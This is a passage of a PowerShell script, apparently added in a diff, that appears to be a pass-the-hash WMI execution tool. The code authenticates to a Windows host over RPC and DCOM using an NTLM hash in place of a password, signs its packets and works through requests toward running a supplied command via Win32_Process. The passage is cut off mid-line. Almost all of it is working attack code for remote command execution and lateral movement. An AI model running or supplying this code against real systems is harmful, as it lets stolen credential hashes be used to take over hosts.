target hostname as $WMI_hostname" + $target_short = $WMI_hostname + } + + $WMI_client_init.Close() + $WMI_client_stream_init.Close() + $WMI_client = New-Object System.Net.Sockets.TCPClient + $WMI_client.Client.ReceiveTimeout = 30000 + + try + { + $WMI_client.Connect($target_long,"135") + } + catch + { + Write-Output "$target_long did not respond" + } + + if($WMI_client.Connected) + { + $WMI_client_stream = $WMI_client.GetStream() + $RPC_UUID = 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 + $packet_RPC = Get-PacketRPCBind 3 0xd0,0x16 0x01 0x01,0x00 $RPC_UUID 0x00,0x00 + $packet_RPC["RPCBind_FragLength"] = 0x78,0x00 + $packet_RPC["RPCBind_AuthLength"] = 0x28,0x00 + $packet_RPC["RPCBind_NegotiateFlags"] = 0x07,0x82,0x08,0xa2 + $RPC = ConvertFrom-PacketOrderedDictionary $packet_RPC + $WMI_client_send = $RPC + $WMI_client_stream.Write($WMI_client_send,0,$WMI_client_send.Length) > $null + $WMI_client_stream.Flush() + $WMI_client_stream.Read($WMI_client_receive,0,$WMI_client_receive.Length) > $null + $assoc_group = $WMI_client_receive[20..23] + $WMI_NTLMSSP = [System.BitConverter]::ToString($WMI_client_receive) + $WMI_NTLMSSP = $WMI_NTLMSSP -replace "-","" + $WMI_NTLMSSP_index = $WMI_NTLMSSP.IndexOf("4E544C4D53535000") + $WMI_NTLMSSP_bytes_index = $WMI_NTLMSSP_index / 2 + $WMI_domain_length = DataLength2 ($WMI_NTLMSSP_bytes_index + 12) $WMI_client_receive + $WMI_target_length = DataLength2 ($WMI_NTLMSSP_bytes_index + 40) $WMI_client_receive + $WMI_session_ID = $WMI_client_receive[44..51] + $WMI_NTLM_challenge = $WMI_client_receive[($WMI_NTLMSSP_bytes_index + 24)..($WMI_NTLMSSP_bytes_index + 31)] + $WMI_target_details = $WMI_client_receive[($WMI_NTLMSSP_bytes_index + 56 + $WMI_domain_length)..($WMI_NTLMSSP_bytes_index + 55 + $WMI_domain_length + $WMI_target_length)] + $WMI_target_time_bytes = $WMI_target_details[($WMI_target_details.length - 12)..($WMI_target_details.length - 5)] + $NTLM_hash_bytes = (&{for ($i = 0;$i -lt $hash.length;$i += 2){$hash.SubString($i,2)}}) -join "-" + $NTLM_hash_bytes = $NTLM_hash_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $auth_hostname = (get-childitem -path env:computername).Value + $auth_hostname_bytes = [System.Text.Encoding]::Unicode.GetBytes($auth_hostname) + $auth_domain = $Domain + $auth_domain_bytes = [System.Text.Encoding]::Unicode.GetBytes($auth_domain) + $auth_username_bytes = [System.Text.Encoding]::Unicode.GetBytes($username) + $auth_domain_length = [System.BitConverter]::GetBytes($auth_domain_bytes.Length) + $auth_domain_length = $auth_domain_length[0,1] + $auth_domain_length = [System.BitConverter]::GetBytes($auth_domain_bytes.Length) + $auth_domain_length = $auth_domain_length[0,1] + $auth_username_length = [System.BitConverter]::GetBytes($auth_username_bytes.Length) + $auth_username_length = $auth_username_length[0,1] + $auth_hostname_length = [System.BitConverter]::GetBytes($auth_hostname_bytes.Length) + $auth_hostname_length = $auth_hostname_length[0,1] + $auth_domain_offset = 0x40,0x00,0x00,0x00 + $auth_username_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + 64) + $auth_hostname_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + 64) + $auth_LM_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + 64) + $auth_NTLM_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + 88) + $HMAC_MD5 = New-Object System.Security.Cryptography.HMACMD5 + $HMAC_MD5.key = $NTLM_hash_bytes + $username_and_target = $username.ToUpper() + $username_and_target_bytes = [System.Text.Encoding]::Unicode.GetBytes($username_and_target) + $username_and_target_bytes += $auth_domain_bytes + $NTLMv2_hash = $HMAC_MD5.ComputeHash($username_and_target_bytes) + $client_challenge = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) + $client_challenge_bytes = $client_challenge.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + + $security_blob_bytes = 0x01,0x01,0x00,0x00, + 0x00,0x00,0x00,0x00 + + $WMI_target_time_bytes + + $client_challenge_bytes + + 0x00,0x00,0x00,0x00 + + $WMI_target_details + + 0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00 + + $server_challenge_and_security_blob_bytes = $WMI_NTLM_challenge + $security_blob_bytes + $HMAC_MD5.key = $NTLMv2_hash + $NTLMv2_response = $HMAC_MD5.ComputeHash($server_challenge_and_security_blob_bytes) + $session_base_key = $HMAC_MD5.ComputeHash($NTLMv2_response) + $NTLMv2_response = $NTLMv2_response + $security_blob_bytes + $NTLMv2_response_length = [System.BitConverter]::GetBytes($NTLMv2_response.Length) + $NTLMv2_response_length = $NTLMv2_response_length[0,1] + $WMI_session_key_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + $NTLMv2_response.Length + 88) + $WMI_session_key_length = 0x00,0x00 + $WMI_negotiate_flags = 0x15,0x82,0x88,0xa2 + + $NTLMSSP_response = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00, + 0x03,0x00,0x00,0x00, + 0x18,0x00, + 0x18,0x00 + + $auth_LM_offset + + $NTLMv2_response_length + + $NTLMv2_response_length + + $auth_NTLM_offset + + $auth_domain_length + + $auth_domain_length + + $auth_domain_offset + + $auth_username_length + + $auth_username_length + + $auth_username_offset + + $auth_hostname_length + + $auth_hostname_length + + $auth_hostname_offset + + $WMI_session_key_length + + $WMI_session_key_length + + $WMI_session_key_offset + + $WMI_negotiate_flags + + $auth_domain_bytes + + $auth_username_bytes + + $auth_hostname_bytes + + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + + $NTLMv2_response + + $assoc_group = $WMI_client_receive[20..23] + $packet_RPC = Get-PacketRPCAUTH3 $NTLMSSP_response + $RPC = ConvertFrom-PacketOrderedDictionary $packet_RPC + $WMI_client_send = $RPC + $WMI_client_stream.Write($WMI_client_send,0,$WMI_client_send.Length) > $null + $WMI_client_stream.Flush() + $causality_ID = [String](1..16 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) + [Byte[]]$causality_ID_bytes = $causality_ID.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $unused_buffer = [String](1..16 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) + [Byte[]]$unused_buffer_bytes = $unused_buffer.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $packet_DCOM_remote_create_instance = Get-PacketDCOMRemoteCreateInstance $causality_ID_bytes $target_short + $DCOM_remote_create_instance = ConvertFrom-PacketOrderedDictionary $packet_DCOM_remote_create_instance + $packet_RPC = Get-PacketRPCRequest 0x03 $DCOM_remote_create_instance.Length 0 0 0x03,0x00,0x00,0x00 0x01,0x00 0x04,0x00 + $RPC = ConvertFrom-PacketOrderedDictionary $packet_RPC + $WMI_client_send = $RPC + $DCOM_remote_create_instance + $WMI_client_stream.Write($WMI_client_send,0,$WMI_client_send.Length) > $null + $WMI_client_stream.Flush() + $WMI_client_stream.Read($WMI_client_receive,0,$WMI_client_receive.Length) > $null + + if($WMI_client_receive[2] -eq 3 -and [System.BitConverter]::ToString($WMI_client_receive[24..27]) -eq '05-00-00-00') + { + Write-Output "$output_username WMI access denied on $target_long" + } + elseif($WMI_client_receive[2] -eq 3) + { + $error_code = [System.BitConverter]::ToString($WMI_client_receive[27..24]) + $error_code = $error_code -replace "-","" + Write-Output "Error code 0x$error_code" + } + elseif($WMI_client_receive[2] -eq 2 -and !$WMI_execute) + { + Write-Output "$output_username accessed WMI on $target_long" + } + elseif($WMI_client_receive[2] -eq 2) + { + + Write-Verbose "$output_username accessed WMI on $target_long" + + if($target_short -eq '127.0.0.1') + { + $target_short = $auth_hostname + } + + $target_unicode = 0x07,0x00 + [System.Text.Encoding]::Unicode.GetBytes($target_short + "[") + $target_search = [System.BitConverter]::ToString($target_unicode) + $target_search = $target_search -replace "-","" + $WMI_message = [System.BitConverter]::ToString($WMI_client_receive) + $WMI_message = $WMI_message -replace "-","" + $target_index = $WMI_message.IndexOf($target_search) + + if($target_index -lt 1) + { + $target_address_list = [System.Net.Dns]::GetHostEntry($target_long).AddressList + + ForEach($IP_address in $target_address_list) + { + $target_short = $IP_address.IPAddressToString + $target_unicode = 0x07,0x00 + [System.Text.Encoding]::Unicode.GetBytes($target_short + "[") + $target_search = [System.BitConverter]::ToString($target_unicode) + $target_search = $target_search -replace "-","" + $target_index = $WMI_message.IndexOf($target_search) + + if($target_index -gt 0) + { + break + } + + } + + } + + if($target_long -cne $target_short) + { + Write-Verbose "Using $target_short for random port extraction" + } + + if($target_index -gt 0) + { + $target_bytes_index = $target_index / 2 + $WMI_random_port = $WMI_client_receive[($target_bytes_index + $target_unicode.Length)..($target_bytes_index + $target_unicode.Length + 8)] + $WMI_random_port = [System.BitConverter]::ToString($WMI_random_port) + $WMI_random_port_end_index = $WMI_random_port.IndexOf("-5D") + + if($WMI_random_port_end_index -gt 0) + { + $WMI_random_port = $WMI_random_port.SubString(0,$WMI_random_port_end_index) + } + + $WMI_random_port = $WMI_random_port -replace "-00","" + $WMI_random_port = $WMI_random_port.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + [Int]$WMI_random_port_int = -join $WMI_random_port + $MEOW = [System.BitConverter]::ToString($WMI_client_receive) + $MEOW = $MEOW -replace "-","" + $MEOW_index = $MEOW.IndexOf("4D454F570100000018AD09F36AD8D011A07500C04FB68820") + $MEOW_bytes_index = $MEOW_index / 2 + $OXID = $WMI_client_receive[($MEOW_bytes_index + 32)..($MEOW_bytes_index + 39)] + $IPID = $WMI_client_receive[($MEOW_bytes_index + 48)..($MEOW_bytes_index + 63)] + $OXID = [System.BitConverter]::ToString($OXID) + $OXID = $OXID -replace "-","" + $OXID_index = $MEOW.IndexOf($OXID,$MEOW_index + 100) + $OXID_bytes_index = $OXID_index / 2 + $object_UUID = $WMI_client_receive[($OXID_bytes_index + 12)..($OXID_bytes_index + 27)] + $WMI_client_random_port = New-Object System.Net.Sockets.TCPClient + $WMI_client_random_port.Client.ReceiveTimeout = 30000 + } + + if($WMI_random_port) + { + + Write-Verbose "Connecting to $target_long`:$WMI_random_port_int" + + try + { + $WMI_client_random_port.Connect($target_long,$WMI_random_port_int) + } + catch + { + Write-Output "$target_long`:$WMI_random_port_int did not respond" + } + + } + else + { + Write-Output "Random port extraction failure" + } + + } + else + { + Write-Output "Something went wrong" + } + + if($WMI_client_random_port.Connected) + { + $WMI_client_random_port_stream = $WMI_client_random_port.GetStream() + $packet_RPC = Get-PacketRPCBind 2 0xd0,0x16 0x03 0x00,0x00 0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46 0x00,0x00 + $packet_RPC["RPCBind_FragLength"] = 0xd0,0x00 + $packet_RPC["RPCBind_AuthLength"] = 0x28,0x00 + $packet_RPC["RPCBind_AuthLevel"] = 0x04 + $packet_RPC["RPCBind_NegotiateFlags"] = 0x97,0x82,0x08,0xa2 + $RPC = ConvertFrom-PacketOrderedDictionary $packet_RPC + $WMI_client_send = $RPC + $WMI_client_random_port_stream.Write($WMI_client_send,0,$WMI_client_send.Length) > $null + $WMI_client_random_port_stream.Flush() + $WMI_client_random_port_stream.Read($WMI_client_receive,0,$WMI_client_receive.Length) > $null + $assoc_group = $WMI_client_receive[20..23] + $WMI_NTLMSSP = [System.BitConverter]::ToString($WMI_client_receive) + $WMI_NTLMSSP = $WMI_NTLMSSP -replace "-","" + $WMI_NTLMSSP_index = $WMI_NTLMSSP.IndexOf("4E544C4D53535000") + $WMI_NTLMSSP_bytes_index = $WMI_NTLMSSP_index / 2 + $WMI_domain_length = DataLength2 ($WMI_NTLMSSP_bytes_index + 12) $WMI_client_receive + $WMI_target_length = DataLength2 ($WMI_NTLMSSP_bytes_index + 40) $WMI_client_receive + $WMI_session_ID = $WMI_client_receive[44..51] + $WMI_NTLM_challenge = $WMI_client_receive[($WMI_NTLMSSP_bytes_index + 24)..($WMI_NTLMSSP_bytes_index + 31)] + $WMI_target_details = $WMI_client_receive[($WMI_NTLMSSP_bytes_index + 56 + $WMI_domain_length)..($WMI_NTLMSSP_bytes_index + 55 + $WMI_domain_length + $WMI_target_length)] + $WMI_target_time_bytes = $WMI_target_details[($WMI_target_details.length - 12)..($WMI_target_details.length - 5)] + $NTLM_hash_bytes = (&{for ($i = 0;$i -lt $hash.length;$i += 2){$hash.SubString($i,2)}}) -join "-" + $NTLM_hash_bytes = $NTLM_hash_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $auth_hostname = (get-childitem -path env:computername).Value + $auth_hostname_bytes = [System.Text.Encoding]::Unicode.GetBytes($auth_hostname) + $auth_domain = $Domain + $auth_domain_bytes = [System.Text.Encoding]::Unicode.GetBytes($auth_domain) + $auth_username_bytes = [System.Text.Encoding]::Unicode.GetBytes($username) + $auth_domain_length = [System.BitConverter]::GetBytes($auth_domain_bytes.Length) + $auth_domain_length = $auth_domain_length[0,1] + $auth_domain_length = [System.BitConverter]::GetBytes($auth_domain_bytes.Length) + $auth_domain_length = $auth_domain_length[0,1] + $auth_username_length = [System.BitConverter]::GetBytes($auth_username_bytes.Length) + $auth_username_length = $auth_username_length[0,1] + $auth_hostname_length = [System.BitConverter]::GetBytes($auth_hostname_bytes.Length) + $auth_hostname_length = $auth_hostname_length[0,1] + $auth_domain_offset = 0x40,0x00,0x00,0x00 + $auth_username_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + 64) + $auth_hostname_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + 64) + $auth_LM_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + 64) + $auth_NTLM_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + 88) + $HMAC_MD5 = New-Object System.Security.Cryptography.HMACMD5 + $HMAC_MD5.key = $NTLM_hash_bytes + $username_and_target = $username.ToUpper() + $username_and_target_bytes = [System.Text.Encoding]::Unicode.GetBytes($username_and_target) + $username_and_target_bytes += $auth_domain_bytes + $NTLMv2_hash = $HMAC_MD5.ComputeHash($username_and_target_bytes) + $client_challenge = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) + $client_challenge_bytes = $client_challenge.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + + $security_blob_bytes = 0x01,0x01,0x00,0x00, + 0x00,0x00,0x00,0x00 + + $WMI_target_time_bytes + + $client_challenge_bytes + + 0x00,0x00,0x00,0x00 + + $WMI_target_details + + 0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00 + + $server_challenge_and_security_blob_bytes = $WMI_NTLM_challenge + $security_blob_bytes + $HMAC_MD5.key = $NTLMv2_hash + $NTLMv2_response = $HMAC_MD5.ComputeHash($server_challenge_and_security_blob_bytes) + $session_base_key = $HMAC_MD5.ComputeHash($NTLMv2_response) + + $client_signing_constant = 0x73,0x65,0x73,0x73,0x69,0x6f,0x6e,0x20,0x6b,0x65,0x79,0x20,0x74,0x6f,0x20, + 0x63,0x6c,0x69,0x65,0x6e,0x74,0x2d,0x74,0x6f,0x2d,0x73,0x65,0x72,0x76, + 0x65,0x72,0x20,0x73,0x69,0x67,0x6e,0x69,0x6e,0x67,0x20,0x6b,0x65,0x79, + 0x20,0x6d,0x61,0x67,0x69,0x63,0x20,0x63,0x6f,0x6e,0x73,0x74,0x61,0x6e, + 0x74,0x00 + + $MD5 = New-Object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider + $client_signing_key = $MD5.ComputeHash($session_base_key + $client_signing_constant) + $NTLMv2_response = $NTLMv2_response + $security_blob_bytes + $NTLMv2_response_length = [System.BitConverter]::GetBytes($NTLMv2_response.Length) + $NTLMv2_response_length = $NTLMv2_response_length[0,1] + $WMI_session_key_offset = [System.BitConverter]::GetBytes($auth_domain_bytes.Length + $auth_username_bytes.Length + $auth_hostname_bytes.Length + $NTLMv2_response.Length + 88) + $WMI_session_key_length = 0x00,0x00 + $WMI_negotiate_flags = 0x15,0x82,0x88,0xa2 + + $NTLMSSP_response = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00, + 0x03,0x00,0x00,0x00, + 0x18,0x00, + 0x18,0x00 + + $auth_LM_offset + + $NTLMv2_response_length + + $NTLMv2_response_length + + $auth_NTLM_offset + + $auth_domain_length + + $auth_domain_length + + $auth_domain_offset + + $auth_username_length + + $auth_username_length + + $auth_username_offset + + $auth_hostname_length + + $auth_hostname_length + + $auth_hostname_offset + + $WMI_session_key_length + + $WMI_session_key_length + + $WMI_session_key_offset + + $WMI_negotiate_flags + + $auth_domain_bytes + + $auth_username_bytes + + $auth_hostname_bytes + + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + + $NTLMv2_response + + $HMAC_MD5.key = $client_signing_key + [Byte[]]$sequence_number = 0x00,0x00,0x00,0x00 + $packet_RPC = Get-PacketRPCAUTH3 $NTLMSSP_response + $packet_RPC["RPCAUTH3_CallID"] = 0x02,0x00,0x00,0x00 + $packet_RPC["RPCAUTH3_AuthLevel"] = 0x04 + $RPC = ConvertFrom-PacketOrderedDictionary $packet_RPC + $WMI_client_send = $RPC + $WMI_client_random_port_stream.Write($WMI_client_send,0,$WMI_client_send.Length) > $null + $WMI_client_random_port_stream.Flush() + $packet_RPC = Get-PacketRPCRequest 0x83 76 16 4 0x02,0x00,0x00,0x00 0x00,0x00 0x03,0x00 $object_UUID + $packet_rem_query_interface = Get-PacketDCOMRemQueryInterface $causality_ID_bytes $IPID 0xd6,0x1c,0x78,0xd4,0xd3,0xe5,0xdf,0x44,0xad,0x94,0x93,0x0e,0xfe,0x48,0xa8,0x87 + $packet_NTLMSSP_verifier = Get-PacketNTLMSSPVerifier 4 0x04 $sequence_number + $RPC = ConvertFrom-PacketOrderedDictionary $packet_RPC + $rem_query_interface = ConvertFrom-PacketOrderedDictionary $packet_rem_query_interface + $NTLMSSP_verifier = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_verifier + $HMAC_MD5.key = $client_signing_key + $RPC_signature = $HMAC_MD5.ComputeHash($sequence_number + $RPC + $rem_query_interface + $NTLMSSP_verifier[0..11]) + $RPC_signature = $RPC_signature[0..7] + $packet_NTLMSSP_verifier["NTLMSSPVerifier_NTLMSSPVerifierChecksum"] = $RPC_signature + $NTLMSSP_verifier = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_verifier + $WMI_client_send = $RPC + $rem_query_interface + $NTLMSSP_verifier + $WMI_client_random_port_stream.Write($WMI_client_send,0,$WMI_client_send.Length) > $null + $WMI_client_random_port_stream.Flush() + $WMI_client_random_port_stream.Read($WMI_client_receive,0,$WMI_client_receive.Length) > $null + $WMI_client_stage = 'exit' + + if($WMI_client_receive[2] -eq 3 -and [System.BitConverter]::ToString($WMI_client_receive[24..27]) -eq '05-00-00-00') + { + Write-Output "$output_username WMI access denied on $target_long" + } + elseif($WMI_client_receive[2] -eq 3) + { + $error_code = [System.BitConverter]::ToString($WMI_client_receive[27..24]) + $error_code = $error_code -replace "-","" + Write-Output "Failed with error code 0x$error_code" + } + elseif($WMI_client_receive[2] -eq 2) + { + $WMI_data = [System.BitConverter]::ToString($WMI_client_receive) + $WMI_data = $WMI_data -replace "-","" + $OXID_index = $WMI_data.IndexOf($OXID) + $OXID_bytes_index = $OXID_index / 2 + $object_UUID2 = $WMI_client_receive[($OXID_bytes_index + 16)..($OXID_bytes_index + 31)] + $WMI_client_stage = 'AlterContext' + } + else + { + Write-Output "Something went wrong" + } + + Write-Verbose "Attempting command execution" + + :WMI_execute_loop while ($WMI_client_stage -ne 'exit') + { + + if($WMI_client_receive[2] -eq 3) + { + $error_code = [System.BitConverter]::ToString($WMI_client_receive[27..24]) + $error_code = $error_code -replace "-","" + Write-Output "Failed with error code 0x$error_code" + $WMI_client_stage = 'exit' + } + + switch ($WMI_client_stage) + { + + 'AlterContext' + { + + switch ($sequence_number[0]) + { + + 0 + { + $alter_context_call_ID = 0x03,0x00,0x00,0x00 + $alter_context_context_ID = 0x02,0x00 + $alter_context_UUID = 0xd6,0x1c,0x78,0xd4,0xd3,0xe5,0xdf,0x44,0xad,0x94,0x93,0x0e,0xfe,0x48,0xa8,0x87 + $WMI_client_stage_next = 'Request' + } + + 1 + { + $alter_context_call_ID = 0x04,0x00,0x00,0x00 + $alter_context_context_ID = 0x03,0x00 + $alter_context_UUID = 0x18,0xad,0x09,0xf3,0x6a,0xd8,0xd0,0x11,0xa0,0x75,0x00,0xc0,0x4f,0xb6,0x88,0x20 + $WMI_client_stage_next = 'Request' + } + + 6 + { + $alter_context_call_ID = 0x09,0x00,0x00,0x00 + $alter_context_context_ID = 0x04,0x00 + $alter_context_UUID = 0x99,0xdc,0x56,0x95,0x8c,0x82,0xcf,0x11,0xa3,0x7e,0x00,0xaa,0x00,0x32,0x40,0xc7 + $WMI_client_stage_next = 'Request' + } + + } + + $packet_RPC = Get-PacketRPCAlterContext $assoc_group $alter_context_call_ID $alter_context_context_ID $alter_context_UUID + $RPC = ConvertFrom-PacketOrderedDictionary $packet_RPC + $WMI_client_send = $RPC + $WMI_client_random_port_stream.Write($WMI_client_send,0,$WMI_client_send.Length) > $null + $WMI_client_random_port_stream.Flush() + $WMI_client_random_port_stream.Read($WMI_client_receive,0,$WMI_client_receive.Length) > $null + $WMI_client_stage = $WMI_client_stage_next + } + + 'Request' + { + + switch ($sequence_number[0]) + { + + 0 + { + $sequence_number = 0x01,0x00,0x00,0x00 + $request_flags = 0x83 + $request_auth_padding = 12 + $request_call_ID = 0x03,0x00,0x00,0x00 + $request_context_ID = 0x02,0x00 + $request_opnum = 0x03,0x00 + $request_UUID = $object_UUID2 + $hostname_length = [System.BitConverter]::GetBytes($auth_hostname.Length + 1) + $WMI_client_stage_next = 'AlterContext' + + if([Bool]($auth_hostname.Length % 2)) + { + $auth_hostname_bytes += 0x00,0x00 + } + else + { + $auth_hostname_bytes += 0x00,0x00,0x00,0x00 + } + + $stub_data = 0x05,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + + $causality_ID_bytes + + 0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00 + + $hostname_length + + 0x00,0x00,0x00,0x00 + + $hostname_length + + $auth_hostname_bytes + + $process_ID_bytes + + 0x00,0x00,0x00,0x00,0x00,0x00 + + } + + 1 + { + $sequence_number = 0x02,0x00,0x00,0x00 + $request_flags = 0x83 + $request_auth_padding = 8 + $request_call_ID = 0x04,0x00,0x00,0x00 + $request_context_ID = 0x03,0x00 + $request_opnum = 0x03,0x00 + $request_UUID = $IPID + $WMI_client_stage_next = 'Request' + + $stub_data = 0x05,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + + $causality_ID_bytes + + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + + } + + 2 + { + $sequence_number = 0x03,0x00,0x00,0x00 + $request_flags = 0x83 + $request_auth_padding = 0 + $request_call_ID = 0x05,0x00,0x00,0x00 + $request_context_ID = 0x03,0x00 + $request_opnum = 0x06,0x00 + $request_UUID = $IPID + [Byte[]]$WMI_namespace_length = [System.BitConverter]::GetBytes($target_short.Length + 14) + [Byte[]]$WMI_namespace_unicode = [System.Text.Encoding]::Unicode.GetBytes("\\$target_short\root\cimv2") + $WMI_client_stage_next = 'Request' + + if([Bool]($target_short.Length % 2)) + { + $WMI_namespace_unicode += 0x00,0x00,0x00,0x00 + } + else + { + $WMI_namespace_unicode += 0x00,0x00 + } + + $stub_data = 0x05,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + + $causality_ID_bytes + + 0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00 + + $WMI_namespace_length + + 0x00,0x00,0x00,0x00 + + $WMI_namespace_length + + $WMI_namespace_unicode + + 0x04,0x00,0x02,0x00,0x09,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x09, + 0x00,0x00,0x00,0x65,0x00,0x6e,0x00,0x2d,0x00,0x55,0x00,0x53,0x00, + 0x2c,0x00,0x65,0x00,0x6e,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00 + + } + + 3 + { + $sequence_number = 0x04,0x00,0x00,0x00 + $request_flags = 0x83 + $request_auth_padding = 8 + $request_call_ID = 0x06,0x00,0x00,0x00 + $request_context_ID = 0x00,0x00 + $request_opnum = 0x05,0x00 + $request_UUID = $object_UUID + $WMI_client_stage_next = 'Request' + $WMI_data = [System.BitConverter]::ToString($WMI_client_receive) + $WMI_data = $WMI_data -replace "-","" + $OXID_index = $WMI_data.IndexOf($OXID) + $OXID_bytes_index = $OXID_index / 2 + $IPID2 = $WMI_client_receive[($OXID_bytes_index + 16)..($OXID_bytes_index + 31)] + $packet_rem_release = Get-PacketDCOMRemRelease $causality_ID_bytes $object_UUID2 $IPID + $stub_data = ConvertFrom-PacketOrderedDictionary $packet_rem_release + } + + 4 + { + $sequence_number = 0x05,0x00,0x00,0x00 + $request_flags = 0x83 + $request_auth_padding = 4 + $request_call_ID = 0x07,0x00,0x00,0x00 + $request_context_ID = 0x00,0x00 + $request_opnum = 0x03,0x00 + $request_UUID = $object_UUID + $WMI_client_stage_next = 'Request' + $packet_rem_query_interface = Get-PacketDCOMRemQueryInterface $causality_ID_bytes $IPID2 0x9e,0xc1,0xfc,0xc3,0x70,0xa9,0xd2,0x11,0x8b,0x5a,0x00,0xa0,0xc9,0xb7,0xc9,0xc4 + $stub_data = ConvertFrom-PacketOrderedDictionary $packet_rem_query_interface + } + + 5 + { + $sequence_number = 0x06,0x00,0x00,0x00 + $request_flags = 0x83 + $request_auth_padding = 4 + $request_call_ID = 0x08,0x00,0x00,0x00 + $request_context_ID = 0x00,0x00 + $request_opnum = 0x03,0x00 + $request_UUID = $object_UUID + $WMI_client_stage_next = 'AlterContext' + $packet_rem_query_interface = Get-PacketDCOMRemQueryInterface $causality_ID_bytes $IPID2 0x83,0xb2,0x96,0xb1,0xb4,0xba,0x1a,0x10,0xb6,0x9c,0x00,0xaa,0x00,0x34,0x1d,0x07 + $stub_data = ConvertFrom-PacketOrderedDictionary $packet_rem_query_interface + } + + 6 + { + $sequence_number = 0x07,0x00,0x00,0x00 + $request_flags = 0x83 + $request_auth_padding = 0 + $request_call_ID = 0x09,0x00,0x00,0x00 + $request_context_ID = 0x04,0x00 + $request_opnum = 0x06,0x00 + $request_UUID = $IPID2 + $WMI_client_stage_next = 'Request' + + $stub_data = 0x05,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + + $causality_ID_bytes + + 0x00,0x00,0x00,0x00,0x55,0x73,0x65,0x72,0x0d,0x00,0x00,0x00,0x1a, + 0x00,0x00,0x00,0x0d,0x00,0x00,0x00,0x77,0x00,0x69,0x00,0x6e,0x00, + 0x33,0x00,0x32,0x00,0x5f,0x00,0x70,0x00,0x72,0x00,0x6f,0x00,0x63, + 0x00,0x65,0x00,0x73,0x00,0x73,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00 + + } + + 7 + { + $sequence_number = 0x08,0x00,0x00,0x00 + $request_flags = 0x83 + $request_auth_padding = 0 + $request_call_ID = 0x10,0x00,0x00,0x00 + $request_context_ID = 0x04,0x00 + $request_opnum = 0x06,0x00 + $request_UUID = $IPID2 + $WMI_client_stage_next = 'Request' + + $stub_data = 0x05,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + + $causality_ID_bytes + + 0x00,0x00,0x00,0x00,0x55,0x73,0x65,0x72,0x0d,0x00,0x00,0x00,0x1a, + 0x00,0x00,0x00,0x0d,0x00,0x00,0x00,0x77,0x00,0x69,0x00,0x6e,0x00, + 0x33,0x00,0x32,0x00,0x5f,0x00,0x70,0x00,0x72,0x00,0x6f,0x00,0x63, + 0x00,0x65,0x00,0x73,0x00,0x73,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00 + + } + + 8 + { + $sequence_number = 0x09,0x00,0x00,0x00 + $request_flags = 0x83 + $request_auth_padding = 8 + $request_call_ID = 0x0b,0x00,0x00,0x00 + $request_context_ID = 0x04,0x00 + $request_opnum = 0x18,0x00 + $request_UUID = $IPID2 + $WMI_client_stage_next = 'Result' + [Byte[]]$stub_length = [System.BitConverter]::GetBytes($Command.length + 1769) + $stub_length = $stub_length[0,1] + [Byte[]]$stub_length2 = 